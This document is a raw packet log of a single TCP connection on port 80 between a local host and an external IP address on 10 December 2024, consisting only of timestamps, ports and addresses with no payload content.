Dec 10, 2024 13:10:58.866470098 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.866501093 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.867444038 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.867490053 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.867556095 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.868401051 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.868432045 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.868449926 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.869398117 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.869441032 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.869587898 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.870506048 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.870542049 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.870557070 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.871452093 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.871495008 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.872133017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.872621059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.872661114 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.872823954 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.873522043 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.873563051 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.873671055 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.874618053 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.874629974 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.874654055 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.875533104 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.875577927 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.875715017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.876595020 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.876605988 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.876645088 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.877639055 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.877681017 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.877716064 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.878721952 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.878767014 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.878844976 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.879662037 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.879699945 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.879781008 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.880665064 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.880707026 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.881112099 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.881764889 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.881803036 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.881956100 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.882744074 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.882787943 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.882849932 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.883783102 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.883814096 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.883833885 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.884941101 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.884989977 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.885055065 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.885859013 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.885869980 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.885915041 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.886877060 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.886920929 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.886921883 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.887895107 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.887933016 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.888004065 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.889075994 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.889086008 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.889125109 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.890006065 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.890043974 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.890047073 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.890991926 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.891040087 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.891223907 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.892091990 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.892138004 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.892215967 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.892988920 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.893037081 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:58.893058062 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.894047976 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:58.894099951 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.032732010 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.032919884 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.032968044 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.033243895 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.033257008 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.033308983 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.034418106 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.034728050 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.034774065 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.035383940 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.035394907 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.035448074 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.036359072 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.036417007 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.036461115 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.037381887 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.037425995 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.037476063 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.038482904 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.038562059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.038600922 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.039551020 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.039562941 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.039608955 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.040491104 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.040503025 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.040556908 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.041591883 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.041656017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.041702986 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.042556047 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.042929888 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.042982101 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.043550014 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.043560982 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.043603897 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.044641018 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.044683933 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.044723988 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.045555115 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.045820951 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.045860052 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.046586037 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.046736002 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.046785116 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.047833920 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.047895908 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.047939062 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.049016953 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.049067974 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.049103975 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.050061941 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.050318003 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.050357103 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.051119089 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.051281929 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.051322937 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.052006960 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.052052975 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.052086115 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.053081989 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.053092957 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.053129911 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.054071903 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.054167032 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.054208994 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.054955959 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.055111885 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.055155993 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.055907011 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.056032896 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.056077957 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.056823015 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.057317972 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.057363987 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.057873964 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.058124065 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.058165073 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.059015036 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.059025049 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.059067965 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.060026884 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.060112953 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.060156107 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.061067104 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.061230898 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.061275959 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.062088966 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.062350035 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.062393904 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.063199043 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.063210011 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.063251019 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.064256907 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.064311981 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.064354897 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.065263987 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.065594912 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.065634966 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.066308022 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.067532063 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.067540884 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.067552090 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.067574024 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.067595959 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.068840027 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.068850994 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.068905115 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.069859982 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.069871902 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.069921017 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.070986032 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.071002007 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.071041107 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.071971893 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.072165966 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.072216034 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.072969913 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.073009014 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.073050022 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.073986053 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.073998928 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.074039936 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.074965954 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.075381994 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.075423002 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.075958014 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.075972080 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.076005936 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.076977015 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.076988935 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.077039003 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.077908039 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.077920914 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.077965021 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.078882933 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.079109907 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.079158068 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.080296993 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.080308914 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.080348969 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.081047058 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.081057072 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.081111908 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.082016945 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.082035065 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.082082033 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.082900047 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.083107948 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.083151102 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.083740950 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.083751917 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.083796024 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.084906101 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.084917068 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.084961891 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.085820913 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.085938931 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.085982084 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.086925983 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.133500099 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.225128889 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.225229025 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.225286007 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.225857019 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.225867987 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.225914955 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.226711035 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.226758957 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.226809978 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.227720022 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.227730989 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.227777958 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.228820086 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.228934050 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.228981972 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.229772091 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.229849100 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.229899883 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.230772018 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.230839014 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.230880022 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.231937885 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.232072115 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.232117891 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.233236074 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.233267069 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.233306885 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.234057903 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.234170914 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.234209061 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.234879017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.234889984 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.234922886 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.235924959 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.236159086 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.236201048 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.237322092 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.237332106 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.237386942 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.237972975 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.238080978 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.238122940 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.239048958 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.239062071 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.239099026 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.240076065 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.240087032 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.240129948 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.241115093 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.241127014 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.241169930 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.242065907 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.242078066 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.242120028 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.243195057 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.243206024 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.243280888 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.244165897 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.244226933 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.244270086 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.245136023 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.245213985 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.245249033 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.246174097 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.246773958 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.246813059 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.247245073 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.247284889 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.247324944 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.248255014 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.248383999 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.248435020 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.249209881 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.249486923 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.249538898 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.250309944 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.250319958 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.250371933 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.251449108 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.251460075 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.251507998 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.252382040 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.252511978 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.252557993 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.253377914 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.253730059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.253779888 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.254378080 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.254472017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.254511118 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.255444050 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.255563974 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.255601883 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.256510019 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.256575108 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.256638050 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.258255005 CET	80	49735	45.9.191.182	192.168.2.4
